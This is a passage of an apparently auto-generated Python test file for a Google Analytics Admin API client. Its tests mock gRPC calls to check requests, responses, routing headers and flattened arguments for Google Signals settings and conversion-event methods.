call.side_effect = ( analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], next_page_token="abc", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[], next_page_token="def", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[resources.ChangeHistoryEvent(),], next_page_token="ghi", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.search_change_history_events(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_google_signals_settings( transport: str = "grpc", request_type=analytics_admin.GetGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) response = client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) def test_get_google_signals_settings_from_dict(): test_get_google_signals_settings(request_type=dict) def test_get_google_signals_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: client.get_google_signals_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() @pytest.mark.asyncio async def test_get_google_signals_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) ) response = await client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) @pytest.mark.asyncio async def test_get_google_signals_settings_async_from_dict(): await test_get_google_signals_settings_async(request_type=dict) def test_get_google_signals_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGoogleSignalsSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: call.return_value = resources.GoogleSignalsSettings() client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_google_signals_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGoogleSignalsSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) await client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_google_signals_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_google_signals_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_google_signals_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_google_signals_settings( analytics_admin.GetGoogleSignalsSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_google_signals_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_google_signals_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_google_signals_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_google_signals_settings( analytics_admin.GetGoogleSignalsSettingsRequest(), name="name_value", ) def test_update_google_signals_settings( transport: str = "grpc", request_type=analytics_admin.UpdateGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) response = client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) def test_update_google_signals_settings_from_dict(): test_update_google_signals_settings(request_type=dict) def test_update_google_signals_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. 
client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: client.update_google_signals_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() @pytest.mark.asyncio async def test_update_google_signals_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) ) response = await client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) @pytest.mark.asyncio async def test_update_google_signals_settings_async_from_dict(): await test_update_google_signals_settings_async(request_type=dict) def test_update_google_signals_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleSignalsSettingsRequest() request.google_signals_settings.name = "google_signals_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: call.return_value = resources.GoogleSignalsSettings() client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_signals_settings.name=google_signals_settings.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_google_signals_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleSignalsSettingsRequest() request.google_signals_settings.name = "google_signals_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) await client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_signals_settings.name=google_signals_settings.name/value", ) in kw["metadata"] def test_update_google_signals_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_google_signals_settings( google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].google_signals_settings == resources.GoogleSignalsSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_google_signals_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.update_google_signals_settings( analytics_admin.UpdateGoogleSignalsSettingsRequest(), google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_google_signals_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_google_signals_settings( google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].google_signals_settings == resources.GoogleSignalsSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_google_signals_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_google_signals_settings( analytics_admin.UpdateGoogleSignalsSettingsRequest(), google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_create_conversion_event( transport: str = "grpc", request_type=analytics_admin.CreateConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) response = client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True def test_create_conversion_event_from_dict(): test_create_conversion_event(request_type=dict) def test_create_conversion_event_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: client.create_conversion_event() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() @pytest.mark.asyncio async def test_create_conversion_event_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateConversionEventRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) ) response = await client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True @pytest.mark.asyncio async def test_create_conversion_event_async_from_dict(): await test_create_conversion_event_async(request_type=dict) def test_create_conversion_event_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. 
request = analytics_admin.CreateConversionEventRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: call.return_value = resources.ConversionEvent() client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_conversion_event_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateConversionEventRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) await client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_conversion_event_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = resources.ConversionEvent() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_conversion_event( parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].conversion_event == resources.ConversionEvent(name="name_value") def test_create_conversion_event_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_conversion_event( analytics_admin.CreateConversionEventRequest(), parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) @pytest.mark.asyncio async def test_create_conversion_event_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_conversion_event( parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].conversion_event == resources.ConversionEvent(name="name_value") @pytest.mark.asyncio async def test_create_conversion_event_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_conversion_event( analytics_admin.CreateConversionEventRequest(), parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) def test_get_conversion_event( transport: str = "grpc", request_type=analytics_admin.GetConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) response = client.get_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetConversionEventRequest() # Establish that the response is the type that we expect. 
    assert isinstance(response, resources.ConversionEvent)
    assert response.name == "name_value"
    assert response.event_name == "event_name_value"
    assert response.deletable is True
    assert response.custom is True


def test_get_conversion_event_from_dict():
    # Re-run the request-object test above with the request supplied as a dict.
    test_get_conversion_event(request_type=dict)


def test_get_conversion_event_empty_call():
    """Verify a call with no request and no flattened fields sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        client.get_conversion_event()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetConversionEventRequest()


@pytest.mark.asyncio
async def test_get_conversion_event_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.GetConversionEventRequest,
):
    """Async variant: fake the unary-unary stub and check the decoded response."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.ConversionEvent(
                name="name_value",
                event_name="event_name_value",
                deletable=True,
                custom=True,
            )
        )
        response = await client.get_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetConversionEventRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.ConversionEvent)
    assert response.name == "name_value"
    assert response.event_name == "event_name_value"
    assert response.deletable is True
    assert response.custom is True


@pytest.mark.asyncio
async def test_get_conversion_event_async_from_dict():
    await test_get_conversion_event_async(request_type=dict)


def test_get_conversion_event_field_headers():
    """The resource name must be echoed in the x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetConversionEventRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        call.return_value = resources.ConversionEvent()
        client.get_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_conversion_event_field_headers_async():
    """Async variant of the routing-header propagation check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetConversionEventRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.ConversionEvent()
        )
        await client.get_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_conversion_event_flattened():
    """Flattened keyword arguments must be folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.ConversionEvent()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_conversion_event(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_conversion_event_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_conversion_event(
            analytics_admin.GetConversionEventRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_conversion_event_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_conversion_event), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
call.return_value = resources.ConversionEvent() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_conversion_event_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_conversion_event( analytics_admin.GetConversionEventRequest(), name="name_value", ) def test_delete_conversion_event( transport: str = "grpc", request_type=analytics_admin.DeleteConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteConversionEventRequest() # Establish that the response is the type that we expect. 
    assert response is None


def test_delete_conversion_event_from_dict():
    # Re-run the request-object test above with the request supplied as a dict.
    test_delete_conversion_event(request_type=dict)


def test_delete_conversion_event_empty_call():
    """Verify a call with no request and no flattened fields sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_conversion_event), "__call__"
    ) as call:
        client.delete_conversion_event()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteConversionEventRequest()


@pytest.mark.asyncio
async def test_delete_conversion_event_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.DeleteConversionEventRequest,
):
    """Async variant: fake the unary-unary stub and expect a None response."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_conversion_event), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteConversionEventRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_conversion_event_async_from_dict():
    await test_delete_conversion_event_async(request_type=dict)


def test_delete_conversion_event_field_headers():
    """The resource name must be echoed in the x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteConversionEventRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_conversion_event), "__call__"
    ) as call:
        call.return_value = None
        client.delete_conversion_event(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_conversion_event_field_headers_async():
